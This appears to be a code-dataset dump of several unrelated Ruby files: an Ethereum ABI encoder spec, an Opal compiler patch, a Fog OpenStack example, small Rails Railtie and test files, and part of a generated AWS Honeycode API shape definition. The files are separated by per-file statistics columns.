      expected = "0000000000000000000000000000000000000000000000000000000000001B39"
      expected_hex = EthereumContractABI::Util.toHexByteString(expected)
      result = DecimalEncoder.encode_value(69.69, 2)
      expect(result).to eq(expected_hex)
      # Static-size ABI types occupy exactly one 32-byte word.
      expect(result.bytesize).to eq(32)
    end

    it "encodes basic negative decimal number with 2 digits of precision" do
      expected = "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE4C7"
      expected_hex = EthereumContractABI::Util.toHexByteString(expected)
      result = DecimalEncoder.encode_value(-69.69, 2)
      expect(result).to eq(expected_hex)
      expect(result.bytesize).to eq(32)
    end
  end
end | 40.375 | 83 | 0.767802 |
6283a22db3cfa18cc6f2e83246701ef8d1bd0de2 | 912 | require 'opal/nodes'
class Opal::Nodes::CallNode
  # Rubyspec uses this call to load in language specific features at runtime.
  # We can't do this at runtime, so handle it during compilation
  add_special :language_version do
    if scope.top?
      # arglist is the compiler's s-expression for the call arguments;
      # arglist[2][1] extracts the language-type symbol from it.
      lang_type = arglist[2][1]
      target = "corelib/language/versions/#{lang_type}_1.9"
      if File.exist?(target)
        compiler.requires << target
      end
      # The call itself compiles to nil.
      push fragment("nil")
    end
  end

  # The guards below compile their block bodies only when the guard does
  # not exclude Opal, so inapplicable specs are dropped at compile time.
  add_special :not_supported_on do
    unless arglist.flatten.include? :opal
      compile_default!
    end
  end

  add_special :not_compliant_on do
    unless arglist.flatten.include? :opal
      compile_default!
    end
  end

  add_special :platform_is_not do
    unless arglist.flatten.include? :opal
      compile_default!
    end
  end

  # Inverse guard: compile the body only when :opal IS listed.
  add_special :platform_is do
    if arglist.flatten.include? :opal
      compile_default!
    end
  end
end
| 20.266667 | 77 | 0.685307 |
# OpenStack Compute (Nova) Example
require 'fog'
require 'fog/openstack'

auth_url = "https://example.net/v2.0/tokens"
# NOTE(review): the username looks like a redacted placeholder email.
username = '[email protected]'
password = 'secret'
tenant   = 'My Compute Tenant' # String

compute_client ||= ::Fog::Compute.new(
  :provider           => :openstack,
  :openstack_api_key  => password,
  :openstack_username => username,
  :openstack_auth_url => auth_url,
  :openstack_tenant   => tenant,
)

# Boot a server from an existing Cinder volume.
# NOTE: `name`, `flavor` and `cinder_uuid` are placeholders the caller
# must define before running this example.
vm = compute_client.servers.create(
  :name       => name,
  :flavor_ref => flavor,
  :block_device_mapping_v2 => [
    {
      # Fix: the original was missing the comma after :boot_index => 0,
      # which made this hash a SyntaxError. Also renamed the misspelled
      # `cinder_uddi` placeholder to `cinder_uuid`.
      :boot_index            => 0,
      :device_name           => "vda",
      :source_type           => "volume", # Or "snapshot"
      :destination_type      => "volume",
      :delete_on_termination => false,
      :uuid                  => cinder_uuid,
    }
  ]
)
| 25.666667 | 58 | 0.57379 |
9112d904823048b8ed6e34841faca5d688e3932a | 135 | module PerformEvery
  # Rails integration: registers the gem's rake tasks with the host app.
  class Railtie < ::Rails::Railtie
    rake_tasks do
      load "tasks/perform_every_tasks.rake"
    end
  end
end
| 16.875 | 43 | 0.703704 |
039254b5968d94aa6582d5ab88636c97db4ba703 | 243 | require 'rails_helper'

# Placeholder view spec for family_members/show: the example body is
# entirely commented out, so nothing is verified yet.
RSpec.describe "family_members/show", type: :view do
  # before(:each) do
  #   @family_member = assign(:family_member, FamilyMember.create!())
  # end
  #
  # it "renders attributes in <p>" do
  #   render
  # end
end
| 20.25 | 69 | 0.662551 |
b9b81ec9ecda4b12c844d0f716415746c168dec6 | 199 | require 'rails'

module Proxied
  # Rails integration: loads every .rake file shipped alongside this file
  # under ../tasks so the host app's rake sees them.
  class Railtie < Rails::Railtie
    rake_tasks do
      Dir[File.join(File.dirname(__FILE__), '../tasks/*.rake')].each { |ext| load ext }
    end
  end
end
| 16.583333 | 87 | 0.61809 |
62688333c338756b63f4e0277e617ebd70bb94bf | 320 | # Sample code from Programing Ruby, page 15
# Map each instrument name to its orchestral section.
inst_section = [
  ['cello',    'string'],
  ['clarinet', 'woodwind'],
  ['drum',     'percussion'],
  ['oboe',     'woodwind'],
  ['trumpet',  'brass'],
  ['violin',   'string']
].to_h

# Look up a few instruments; a key that is absent ('bassoon') yields nil.
inst_section['oboe']
inst_section['cello']
inst_section['bassoon']
| 24.615385 | 43 | 0.546875 |
bba4fe33e9dd3bb6cd68bc6d3494f2d79b73268f | 442 | require 'test_helper'

# Smoke test for the classroom/team-project path helper: it only checks
# the helper can be invoked without raising.
class TeamProjectsHelperTest < ActionView::TestCase
  setup do
    @c_id = classrooms(:one).id
    @t_id = team_projects(:one).id
  end

  test "helpers" do
    begin
      classroom_path_team_project_prefix
    rescue Errno::ECONNREFUSED
      # NOTE(review): swallowing ECONNREFUSED lets this test pass even when
      # the helper cannot reach its backing service — confirm intended.
    end
    assert true
  end

  private

  # Stubbed request params the helper under test reads.
  def params
    {classroom_id: @c_id,
     team_project_id: @t_id}
  end

  # Stubbed authenticated session.
  def current_user
    Session.new 1, 'token', 'name'
  end
end | 16.37037 | 51 | 0.678733 |
ab2064470da290f2f3f1dd2ac7da28c3de938e64 | 594 | require_relative 'boot'

require 'rails/all'

# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)

module GoalApp
  # Application-wide configuration for GoalApp.
  class Application < Rails::Application
    # Initialize configuration defaults for originally generated Rails version.
    config.load_defaults 5.1

    # Settings in config/environments/* take precedence over those specified here.
    # Application configuration should go into files in config/initializers
    # -- all .rb files in that directory are automatically loaded.
  end
end
| 31.263158 | 82 | 0.765993 |
386833711079f2eee3dcfd98ab5ec13e57d7c6db | 46,664 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
module Aws::Honeycode
# @api private
module ClientApi
include Seahorse::Model
AccessDeniedException = Shapes::StructureShape.new(name: 'AccessDeniedException')
AutomationExecutionException = Shapes::StructureShape.new(name: 'AutomationExecutionException')
AutomationExecutionTimeoutException = Shapes::StructureShape.new(name: 'AutomationExecutionTimeoutException')
AwsUserArn = Shapes::StringShape.new(name: 'AwsUserArn')
BatchCreateTableRowsRequest = Shapes::StructureShape.new(name: 'BatchCreateTableRowsRequest')
BatchCreateTableRowsResult = Shapes::StructureShape.new(name: 'BatchCreateTableRowsResult')
BatchDeleteTableRowsRequest = Shapes::StructureShape.new(name: 'BatchDeleteTableRowsRequest')
BatchDeleteTableRowsResult = Shapes::StructureShape.new(name: 'BatchDeleteTableRowsResult')
BatchErrorMessage = Shapes::StringShape.new(name: 'BatchErrorMessage')
BatchItemId = Shapes::StringShape.new(name: 'BatchItemId')
BatchUpdateTableRowsRequest = Shapes::StructureShape.new(name: 'BatchUpdateTableRowsRequest')
BatchUpdateTableRowsResult = Shapes::StructureShape.new(name: 'BatchUpdateTableRowsResult')
BatchUpsertTableRowsRequest = Shapes::StructureShape.new(name: 'BatchUpsertTableRowsRequest')
BatchUpsertTableRowsResult = Shapes::StructureShape.new(name: 'BatchUpsertTableRowsResult')
Cell = Shapes::StructureShape.new(name: 'Cell')
CellInput = Shapes::StructureShape.new(name: 'CellInput')
Cells = Shapes::ListShape.new(name: 'Cells')
ClientRequestToken = Shapes::StringShape.new(name: 'ClientRequestToken')
ColumnMetadata = Shapes::StructureShape.new(name: 'ColumnMetadata')
CreateRowData = Shapes::StructureShape.new(name: 'CreateRowData')
CreateRowDataList = Shapes::ListShape.new(name: 'CreateRowDataList')
CreatedRowsMap = Shapes::MapShape.new(name: 'CreatedRowsMap')
DataItem = Shapes::StructureShape.new(name: 'DataItem')
DataItems = Shapes::ListShape.new(name: 'DataItems')
DelimitedTextDelimiter = Shapes::StringShape.new(name: 'DelimitedTextDelimiter')
DelimitedTextImportOptions = Shapes::StructureShape.new(name: 'DelimitedTextImportOptions')
DescribeTableDataImportJobRequest = Shapes::StructureShape.new(name: 'DescribeTableDataImportJobRequest')
DescribeTableDataImportJobResult = Shapes::StructureShape.new(name: 'DescribeTableDataImportJobResult')
DestinationOptions = Shapes::StructureShape.new(name: 'DestinationOptions')
Email = Shapes::StringShape.new(name: 'Email')
ErrorMessage = Shapes::StringShape.new(name: 'ErrorMessage')
Fact = Shapes::StringShape.new(name: 'Fact')
FailedBatchItem = Shapes::StructureShape.new(name: 'FailedBatchItem')
FailedBatchItems = Shapes::ListShape.new(name: 'FailedBatchItems')
Filter = Shapes::StructureShape.new(name: 'Filter')
Format = Shapes::StringShape.new(name: 'Format')
FormattedValue = Shapes::StringShape.new(name: 'FormattedValue')
Formula = Shapes::StringShape.new(name: 'Formula')
GetScreenDataRequest = Shapes::StructureShape.new(name: 'GetScreenDataRequest')
GetScreenDataResult = Shapes::StructureShape.new(name: 'GetScreenDataResult')
HasHeaderRow = Shapes::BooleanShape.new(name: 'HasHeaderRow')
IgnoreEmptyRows = Shapes::BooleanShape.new(name: 'IgnoreEmptyRows')
ImportColumnMap = Shapes::MapShape.new(name: 'ImportColumnMap')
ImportDataCharacterEncoding = Shapes::StringShape.new(name: 'ImportDataCharacterEncoding')
ImportDataSource = Shapes::StructureShape.new(name: 'ImportDataSource')
ImportDataSourceConfig = Shapes::StructureShape.new(name: 'ImportDataSourceConfig')
ImportJobSubmitter = Shapes::StructureShape.new(name: 'ImportJobSubmitter')
ImportOptions = Shapes::StructureShape.new(name: 'ImportOptions')
ImportSourceDataFormat = Shapes::StringShape.new(name: 'ImportSourceDataFormat')
InternalServerException = Shapes::StructureShape.new(name: 'InternalServerException')
InvokeScreenAutomationRequest = Shapes::StructureShape.new(name: 'InvokeScreenAutomationRequest')
InvokeScreenAutomationResult = Shapes::StructureShape.new(name: 'InvokeScreenAutomationResult')
JobId = Shapes::StringShape.new(name: 'JobId')
ListTableColumnsRequest = Shapes::StructureShape.new(name: 'ListTableColumnsRequest')
ListTableColumnsResult = Shapes::StructureShape.new(name: 'ListTableColumnsResult')
ListTableRowsRequest = Shapes::StructureShape.new(name: 'ListTableRowsRequest')
ListTableRowsResult = Shapes::StructureShape.new(name: 'ListTableRowsResult')
ListTablesRequest = Shapes::StructureShape.new(name: 'ListTablesRequest')
ListTablesResult = Shapes::StructureShape.new(name: 'ListTablesResult')
MaxResults = Shapes::IntegerShape.new(name: 'MaxResults')
Name = Shapes::StringShape.new(name: 'Name')
PaginationToken = Shapes::StringShape.new(name: 'PaginationToken')
QueryTableRowsRequest = Shapes::StructureShape.new(name: 'QueryTableRowsRequest')
QueryTableRowsResult = Shapes::StructureShape.new(name: 'QueryTableRowsResult')
RawValue = Shapes::StringShape.new(name: 'RawValue')
RequestTimeoutException = Shapes::StructureShape.new(name: 'RequestTimeoutException')
ResourceId = Shapes::StringShape.new(name: 'ResourceId')
ResourceIds = Shapes::ListShape.new(name: 'ResourceIds')
ResourceNotFoundException = Shapes::StructureShape.new(name: 'ResourceNotFoundException')
ResultHeader = Shapes::ListShape.new(name: 'ResultHeader')
ResultRow = Shapes::StructureShape.new(name: 'ResultRow')
ResultRows = Shapes::ListShape.new(name: 'ResultRows')
ResultSet = Shapes::StructureShape.new(name: 'ResultSet')
ResultSetMap = Shapes::MapShape.new(name: 'ResultSetMap')
RowDataInput = Shapes::MapShape.new(name: 'RowDataInput')
RowId = Shapes::StringShape.new(name: 'RowId')
RowIdList = Shapes::ListShape.new(name: 'RowIdList')
SecureURL = Shapes::StringShape.new(name: 'SecureURL')
ServiceQuotaExceededException = Shapes::StructureShape.new(name: 'ServiceQuotaExceededException')
ServiceUnavailableException = Shapes::StructureShape.new(name: 'ServiceUnavailableException')
SourceDataColumnIndex = Shapes::IntegerShape.new(name: 'SourceDataColumnIndex')
SourceDataColumnProperties = Shapes::StructureShape.new(name: 'SourceDataColumnProperties')
StartTableDataImportJobRequest = Shapes::StructureShape.new(name: 'StartTableDataImportJobRequest')
StartTableDataImportJobResult = Shapes::StructureShape.new(name: 'StartTableDataImportJobResult')
Table = Shapes::StructureShape.new(name: 'Table')
TableColumn = Shapes::StructureShape.new(name: 'TableColumn')
TableColumnName = Shapes::StringShape.new(name: 'TableColumnName')
TableColumns = Shapes::ListShape.new(name: 'TableColumns')
TableDataImportJobMessage = Shapes::StringShape.new(name: 'TableDataImportJobMessage')
TableDataImportJobMetadata = Shapes::StructureShape.new(name: 'TableDataImportJobMetadata')
TableDataImportJobStatus = Shapes::StringShape.new(name: 'TableDataImportJobStatus')
TableName = Shapes::StringShape.new(name: 'TableName')
TableRow = Shapes::StructureShape.new(name: 'TableRow')
TableRows = Shapes::ListShape.new(name: 'TableRows')
Tables = Shapes::ListShape.new(name: 'Tables')
ThrottlingException = Shapes::StructureShape.new(name: 'ThrottlingException')
TimestampInMillis = Shapes::TimestampShape.new(name: 'TimestampInMillis')
UpdateRowData = Shapes::StructureShape.new(name: 'UpdateRowData')
UpdateRowDataList = Shapes::ListShape.new(name: 'UpdateRowDataList')
UpsertAction = Shapes::StringShape.new(name: 'UpsertAction')
UpsertRowData = Shapes::StructureShape.new(name: 'UpsertRowData')
UpsertRowDataList = Shapes::ListShape.new(name: 'UpsertRowDataList')
UpsertRowsResult = Shapes::StructureShape.new(name: 'UpsertRowsResult')
UpsertRowsResultMap = Shapes::MapShape.new(name: 'UpsertRowsResultMap')
ValidationException = Shapes::StructureShape.new(name: 'ValidationException')
VariableName = Shapes::StringShape.new(name: 'VariableName')
VariableValue = Shapes::StructureShape.new(name: 'VariableValue')
VariableValueMap = Shapes::MapShape.new(name: 'VariableValueMap')
WorkbookCursor = Shapes::IntegerShape.new(name: 'WorkbookCursor')
AccessDeniedException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
AccessDeniedException.struct_class = Types::AccessDeniedException
AutomationExecutionException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
AutomationExecutionException.struct_class = Types::AutomationExecutionException
AutomationExecutionTimeoutException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
AutomationExecutionTimeoutException.struct_class = Types::AutomationExecutionTimeoutException
BatchCreateTableRowsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
BatchCreateTableRowsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
BatchCreateTableRowsRequest.add_member(:rows_to_create, Shapes::ShapeRef.new(shape: CreateRowDataList, required: true, location_name: "rowsToCreate"))
BatchCreateTableRowsRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, location_name: "clientRequestToken"))
BatchCreateTableRowsRequest.struct_class = Types::BatchCreateTableRowsRequest
BatchCreateTableRowsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
BatchCreateTableRowsResult.add_member(:created_rows, Shapes::ShapeRef.new(shape: CreatedRowsMap, required: true, location_name: "createdRows"))
BatchCreateTableRowsResult.add_member(:failed_batch_items, Shapes::ShapeRef.new(shape: FailedBatchItems, location_name: "failedBatchItems"))
BatchCreateTableRowsResult.struct_class = Types::BatchCreateTableRowsResult
BatchDeleteTableRowsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
BatchDeleteTableRowsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
BatchDeleteTableRowsRequest.add_member(:row_ids, Shapes::ShapeRef.new(shape: RowIdList, required: true, location_name: "rowIds"))
BatchDeleteTableRowsRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, location_name: "clientRequestToken"))
BatchDeleteTableRowsRequest.struct_class = Types::BatchDeleteTableRowsRequest
BatchDeleteTableRowsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
BatchDeleteTableRowsResult.add_member(:failed_batch_items, Shapes::ShapeRef.new(shape: FailedBatchItems, location_name: "failedBatchItems"))
BatchDeleteTableRowsResult.struct_class = Types::BatchDeleteTableRowsResult
BatchUpdateTableRowsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
BatchUpdateTableRowsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
BatchUpdateTableRowsRequest.add_member(:rows_to_update, Shapes::ShapeRef.new(shape: UpdateRowDataList, required: true, location_name: "rowsToUpdate"))
BatchUpdateTableRowsRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, location_name: "clientRequestToken"))
BatchUpdateTableRowsRequest.struct_class = Types::BatchUpdateTableRowsRequest
BatchUpdateTableRowsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
BatchUpdateTableRowsResult.add_member(:failed_batch_items, Shapes::ShapeRef.new(shape: FailedBatchItems, location_name: "failedBatchItems"))
BatchUpdateTableRowsResult.struct_class = Types::BatchUpdateTableRowsResult
BatchUpsertTableRowsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
BatchUpsertTableRowsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
BatchUpsertTableRowsRequest.add_member(:rows_to_upsert, Shapes::ShapeRef.new(shape: UpsertRowDataList, required: true, location_name: "rowsToUpsert"))
BatchUpsertTableRowsRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, location_name: "clientRequestToken"))
BatchUpsertTableRowsRequest.struct_class = Types::BatchUpsertTableRowsRequest
BatchUpsertTableRowsResult.add_member(:rows, Shapes::ShapeRef.new(shape: UpsertRowsResultMap, required: true, location_name: "rows"))
BatchUpsertTableRowsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
BatchUpsertTableRowsResult.add_member(:failed_batch_items, Shapes::ShapeRef.new(shape: FailedBatchItems, location_name: "failedBatchItems"))
BatchUpsertTableRowsResult.struct_class = Types::BatchUpsertTableRowsResult
Cell.add_member(:formula, Shapes::ShapeRef.new(shape: Formula, location_name: "formula"))
Cell.add_member(:format, Shapes::ShapeRef.new(shape: Format, location_name: "format"))
Cell.add_member(:raw_value, Shapes::ShapeRef.new(shape: RawValue, location_name: "rawValue"))
Cell.add_member(:formatted_value, Shapes::ShapeRef.new(shape: FormattedValue, location_name: "formattedValue"))
Cell.struct_class = Types::Cell
CellInput.add_member(:fact, Shapes::ShapeRef.new(shape: Fact, location_name: "fact"))
CellInput.struct_class = Types::CellInput
Cells.member = Shapes::ShapeRef.new(shape: Cell)
ColumnMetadata.add_member(:name, Shapes::ShapeRef.new(shape: Name, required: true, location_name: "name"))
ColumnMetadata.add_member(:format, Shapes::ShapeRef.new(shape: Format, required: true, location_name: "format"))
ColumnMetadata.struct_class = Types::ColumnMetadata
CreateRowData.add_member(:batch_item_id, Shapes::ShapeRef.new(shape: BatchItemId, required: true, location_name: "batchItemId"))
CreateRowData.add_member(:cells_to_create, Shapes::ShapeRef.new(shape: RowDataInput, required: true, location_name: "cellsToCreate"))
CreateRowData.struct_class = Types::CreateRowData
CreateRowDataList.member = Shapes::ShapeRef.new(shape: CreateRowData)
CreatedRowsMap.key = Shapes::ShapeRef.new(shape: BatchItemId)
CreatedRowsMap.value = Shapes::ShapeRef.new(shape: RowId)
DataItem.add_member(:override_format, Shapes::ShapeRef.new(shape: Format, location_name: "overrideFormat"))
DataItem.add_member(:raw_value, Shapes::ShapeRef.new(shape: RawValue, location_name: "rawValue"))
DataItem.add_member(:formatted_value, Shapes::ShapeRef.new(shape: FormattedValue, location_name: "formattedValue"))
DataItem.struct_class = Types::DataItem
DataItems.member = Shapes::ShapeRef.new(shape: DataItem)
DelimitedTextImportOptions.add_member(:delimiter, Shapes::ShapeRef.new(shape: DelimitedTextDelimiter, required: true, location_name: "delimiter"))
DelimitedTextImportOptions.add_member(:has_header_row, Shapes::ShapeRef.new(shape: HasHeaderRow, location_name: "hasHeaderRow"))
DelimitedTextImportOptions.add_member(:ignore_empty_rows, Shapes::ShapeRef.new(shape: IgnoreEmptyRows, location_name: "ignoreEmptyRows"))
DelimitedTextImportOptions.add_member(:data_character_encoding, Shapes::ShapeRef.new(shape: ImportDataCharacterEncoding, location_name: "dataCharacterEncoding"))
DelimitedTextImportOptions.struct_class = Types::DelimitedTextImportOptions
DescribeTableDataImportJobRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
DescribeTableDataImportJobRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
DescribeTableDataImportJobRequest.add_member(:job_id, Shapes::ShapeRef.new(shape: JobId, required: true, location: "uri", location_name: "jobId"))
DescribeTableDataImportJobRequest.struct_class = Types::DescribeTableDataImportJobRequest
DescribeTableDataImportJobResult.add_member(:job_status, Shapes::ShapeRef.new(shape: TableDataImportJobStatus, required: true, location_name: "jobStatus"))
DescribeTableDataImportJobResult.add_member(:message, Shapes::ShapeRef.new(shape: TableDataImportJobMessage, required: true, location_name: "message"))
DescribeTableDataImportJobResult.add_member(:job_metadata, Shapes::ShapeRef.new(shape: TableDataImportJobMetadata, required: true, location_name: "jobMetadata"))
DescribeTableDataImportJobResult.struct_class = Types::DescribeTableDataImportJobResult
DestinationOptions.add_member(:column_map, Shapes::ShapeRef.new(shape: ImportColumnMap, location_name: "columnMap"))
DestinationOptions.struct_class = Types::DestinationOptions
FailedBatchItem.add_member(:id, Shapes::ShapeRef.new(shape: BatchItemId, required: true, location_name: "id"))
FailedBatchItem.add_member(:error_message, Shapes::ShapeRef.new(shape: BatchErrorMessage, required: true, location_name: "errorMessage"))
FailedBatchItem.struct_class = Types::FailedBatchItem
FailedBatchItems.member = Shapes::ShapeRef.new(shape: FailedBatchItem)
Filter.add_member(:formula, Shapes::ShapeRef.new(shape: Formula, required: true, location_name: "formula"))
Filter.add_member(:context_row_id, Shapes::ShapeRef.new(shape: RowId, location_name: "contextRowId"))
Filter.struct_class = Types::Filter
GetScreenDataRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location_name: "workbookId"))
GetScreenDataRequest.add_member(:app_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location_name: "appId"))
GetScreenDataRequest.add_member(:screen_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location_name: "screenId"))
GetScreenDataRequest.add_member(:variables, Shapes::ShapeRef.new(shape: VariableValueMap, location_name: "variables"))
GetScreenDataRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: MaxResults, location_name: "maxResults"))
GetScreenDataRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
GetScreenDataRequest.struct_class = Types::GetScreenDataRequest
GetScreenDataResult.add_member(:results, Shapes::ShapeRef.new(shape: ResultSetMap, required: true, location_name: "results"))
GetScreenDataResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
GetScreenDataResult.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
GetScreenDataResult.struct_class = Types::GetScreenDataResult
ImportColumnMap.key = Shapes::ShapeRef.new(shape: ResourceId)
ImportColumnMap.value = Shapes::ShapeRef.new(shape: SourceDataColumnProperties)
ImportDataSource.add_member(:data_source_config, Shapes::ShapeRef.new(shape: ImportDataSourceConfig, required: true, location_name: "dataSourceConfig"))
ImportDataSource.struct_class = Types::ImportDataSource
ImportDataSourceConfig.add_member(:data_source_url, Shapes::ShapeRef.new(shape: SecureURL, location_name: "dataSourceUrl"))
ImportDataSourceConfig.struct_class = Types::ImportDataSourceConfig
ImportJobSubmitter.add_member(:email, Shapes::ShapeRef.new(shape: Email, location_name: "email"))
ImportJobSubmitter.add_member(:user_arn, Shapes::ShapeRef.new(shape: AwsUserArn, location_name: "userArn"))
ImportJobSubmitter.struct_class = Types::ImportJobSubmitter
ImportOptions.add_member(:destination_options, Shapes::ShapeRef.new(shape: DestinationOptions, location_name: "destinationOptions"))
ImportOptions.add_member(:delimited_text_options, Shapes::ShapeRef.new(shape: DelimitedTextImportOptions, location_name: "delimitedTextOptions"))
ImportOptions.struct_class = Types::ImportOptions
InternalServerException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
InternalServerException.struct_class = Types::InternalServerException
InvokeScreenAutomationRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
InvokeScreenAutomationRequest.add_member(:app_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "appId"))
InvokeScreenAutomationRequest.add_member(:screen_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "screenId"))
InvokeScreenAutomationRequest.add_member(:screen_automation_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "automationId"))
InvokeScreenAutomationRequest.add_member(:variables, Shapes::ShapeRef.new(shape: VariableValueMap, location_name: "variables"))
InvokeScreenAutomationRequest.add_member(:row_id, Shapes::ShapeRef.new(shape: RowId, location_name: "rowId"))
InvokeScreenAutomationRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, location_name: "clientRequestToken"))
InvokeScreenAutomationRequest.struct_class = Types::InvokeScreenAutomationRequest
InvokeScreenAutomationResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
InvokeScreenAutomationResult.struct_class = Types::InvokeScreenAutomationResult
ListTableColumnsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
ListTableColumnsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
ListTableColumnsRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location: "querystring", location_name: "nextToken"))
ListTableColumnsRequest.struct_class = Types::ListTableColumnsRequest
ListTableColumnsResult.add_member(:table_columns, Shapes::ShapeRef.new(shape: TableColumns, required: true, location_name: "tableColumns"))
ListTableColumnsResult.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
ListTableColumnsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, location_name: "workbookCursor"))
ListTableColumnsResult.struct_class = Types::ListTableColumnsResult
ListTableRowsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
ListTableRowsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
ListTableRowsRequest.add_member(:row_ids, Shapes::ShapeRef.new(shape: RowIdList, location_name: "rowIds"))
ListTableRowsRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: MaxResults, location_name: "maxResults"))
ListTableRowsRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
ListTableRowsRequest.struct_class = Types::ListTableRowsRequest
ListTableRowsResult.add_member(:column_ids, Shapes::ShapeRef.new(shape: ResourceIds, required: true, location_name: "columnIds"))
ListTableRowsResult.add_member(:rows, Shapes::ShapeRef.new(shape: TableRows, required: true, location_name: "rows"))
ListTableRowsResult.add_member(:row_ids_not_found, Shapes::ShapeRef.new(shape: RowIdList, location_name: "rowIdsNotFound"))
ListTableRowsResult.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
ListTableRowsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
ListTableRowsResult.struct_class = Types::ListTableRowsResult
ListTablesRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
ListTablesRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: MaxResults, location: "querystring", location_name: "maxResults"))
ListTablesRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location: "querystring", location_name: "nextToken"))
ListTablesRequest.struct_class = Types::ListTablesRequest
ListTablesResult.add_member(:tables, Shapes::ShapeRef.new(shape: Tables, required: true, location_name: "tables"))
ListTablesResult.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
ListTablesResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, location_name: "workbookCursor"))
ListTablesResult.struct_class = Types::ListTablesResult
QueryTableRowsRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
QueryTableRowsRequest.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
QueryTableRowsRequest.add_member(:filter_formula, Shapes::ShapeRef.new(shape: Filter, required: true, location_name: "filterFormula"))
QueryTableRowsRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: MaxResults, location_name: "maxResults"))
QueryTableRowsRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
QueryTableRowsRequest.struct_class = Types::QueryTableRowsRequest
QueryTableRowsResult.add_member(:column_ids, Shapes::ShapeRef.new(shape: ResourceIds, required: true, location_name: "columnIds"))
